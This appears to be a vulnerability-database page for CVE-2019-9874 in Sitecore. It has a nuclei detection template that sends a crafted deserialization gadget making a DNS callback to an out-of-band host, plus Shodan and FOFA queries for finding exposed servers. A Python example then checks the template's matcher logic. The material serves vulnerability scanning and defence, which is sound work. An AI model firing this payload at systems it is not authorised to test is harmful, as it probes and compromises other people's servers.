| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2019-9874 | 31 May 2019 00:00 | – | attackerkb |
| CVE-2019-9874 | 26 Mar 2025 18:45 | – | circl |
| Sitecore CMS and Experience Platform (XP) Deserialization Vulnerability | 26 Mar 2025 00:00 | – | cisa_kev |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 26 Mar 2025 12:00 | – | cisa |
| CVE-2019-9874 | 31 May 2019 20:11 | – | cve |
| CVE-2019-9874 | 31 May 2019 20:11 | – | cvelist |
| CVE-2019-9874 | 31 May 2019 21:29 | – | nvd |
| CVE-2019-9874 | 31 May 2019 21:29 | – | osv |
| Deserialization of untrusted data | 31 May 2019 21:29 | – | prion |
| PT-2019-19908 · Sitecore · Sitecore Xp +2 | 31 May 2019 00:00 | – | ptsecurity |
```yaml
id: CVE-2019-9874

info:
  name: Sitecore Experience Platform - Deserialization of Untrusted Data
  author: ritikchaddha
  severity: critical
  description: |
    Sitecore Experience Platform before 8.2 Update-7 and 9.0 before Update-2 is vulnerable to a remote code execution vulnerability (CVE-2019-9874). An attacker can exploit this issue to execute arbitrary code on the affected system via a crafted request to the /sitecore/shell/Applications/Layouts/IDE.aspx endpoint.
  impact: |
    Attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of Sitecore or apply security patches addressing deserialization issues.
  reference:
    - https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9874
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-9874
    epss-score: 0.83857
    epss-percentile: 0.99655
    cwe-id: CWE-502
    cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sitecore
    product: experience_platform
    shodan-query: http.html:"Sitecore Experience Platform"
    fofa-query: body="Sitecore Experience Platform"
  tags: cve,cve2019,sitecore,deserialization,rce,kev,vkev,vuln

http:
  - raw:
      - |
        POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: __CSRFCOOKIE={{randstr}};

        __CSRFTOKEN={{generate_java_gadget("dns", "https://{{interactsh-url}}", "base64")}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PotentialCsrfException"
          - "deserialization"
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100a72332e6dd8a1f3e41fa1ee02415548e5e6fcfe09ff52bc8f554e82b6fcd4684022100db00cc05659a60d0451e2870f0bee40e6acf2372567d52a2e66660839f3a9bf6:922c64590222798bb761d5b6d8e72950
```
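The template flags a host only when the response carries both body strings (compared case-insensitively) and an HTTP 500 status, because `matchers-condition: and` joins the two matchers and the word matcher itself uses `condition: and`. The following Python is an added example, not code from the Vulners page or from the nuclei project: it transcribes those two matchers into dicts and evaluates them against constructed responses, so a defender can confirm exactly which response shape the template reports before trusting a scan result, or reuse the same predicate as a log-side check on stored responses. The `Response` class, the `evaluate` helper and the sample responses are assumptions made for the example; the `part: all` ordering (headers then body) is an assumption about nuclei's behaviour.

```python
"""Evaluate the word/status matchers from the nuclei template above
against constructed HTTP responses (added example, stdlib only).
"""
from dataclasses import dataclass, field


@dataclass
class Response:
    """A captured HTTP response reduced to what the matchers inspect (assumed shape)."""
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


# The template's matcher block transcribed from YAML into Python dicts.
TEMPLATE_MATCHERS = [
    {
        "type": "word",
        "part": "body",
        "words": ["PotentialCsrfException", "deserialization"],
        "condition": "and",
        "case-insensitive": True,
    },
    {"type": "status", "status": [500]},
]
MATCHERS_CONDITION = "and"


def _combine(results, condition):
    """Join a list of booleans with nuclei's 'and' / 'or' semantics."""
    return all(results) if condition == "and" else any(results)


def _part_text(resp, part):
    """Return the response text a matcher's 'part' refers to."""
    if part == "body":
        return resp.body
    if part == "header":
        return "\n".join(f"{k}: {v}" for k, v in resp.headers.items())
    # Assumed: any other value ('all') means headers followed by body.
    return _part_text(resp, "header") + "\n" + resp.body


def match_word(matcher, resp):
    """Word matcher: every (or any) listed string must occur in the chosen part."""
    haystack = _part_text(resp, matcher.get("part", "body"))
    words = matcher["words"]
    if matcher.get("case-insensitive", False):
        haystack = haystack.lower()
        words = [w.lower() for w in words]
    hits = [w in haystack for w in words]
    # nuclei's word matcher defaults to 'or' when no condition is given.
    return _combine(hits, matcher.get("condition", "or"))


def match_status(matcher, resp):
    """Status matcher: the response code must be one of the listed codes."""
    return resp.status in matcher["status"]


def evaluate(matchers, condition, resp):
    """True when the response satisfies the whole matcher block."""
    handlers = {"word": match_word, "status": match_status}
    results = []
    for m in matchers:
        handler = handlers.get(m["type"])
        if handler is None:
            raise ValueError(f"unsupported matcher type: {m['type']}")
        results.append(handler(m, resp))
    return _combine(results, condition)


# Constructed sample responses; none of this is real Sitecore output.
TRIGGERING = Response(
    status=500,
    body="Server Error in '/' Application. PotentialCsrfException: "
         "Deserialization of the CSRF token failed.",
)
BENIGN_500 = Response(status=500, body="Server Error: object reference not set")
BENIGN_200 = Response(status=200, body="PotentialCsrfException deserialization")


if __name__ == "__main__":
    for name, resp in [("triggering", TRIGGERING),
                       ("benign 500", BENIGN_500),
                       ("benign 200", BENIGN_200)]:
        print(f"{name}: {evaluate(TEMPLATE_MATCHERS, MATCHERS_CONDITION, resp)}")
```

Only the first constructed response satisfies the block: the second has the right status but neither string, and the third has both strings but a 200 status. Loosening either `and` to `or` would turn those two into matches, which is the usual source of false positives when templates are edited by hand.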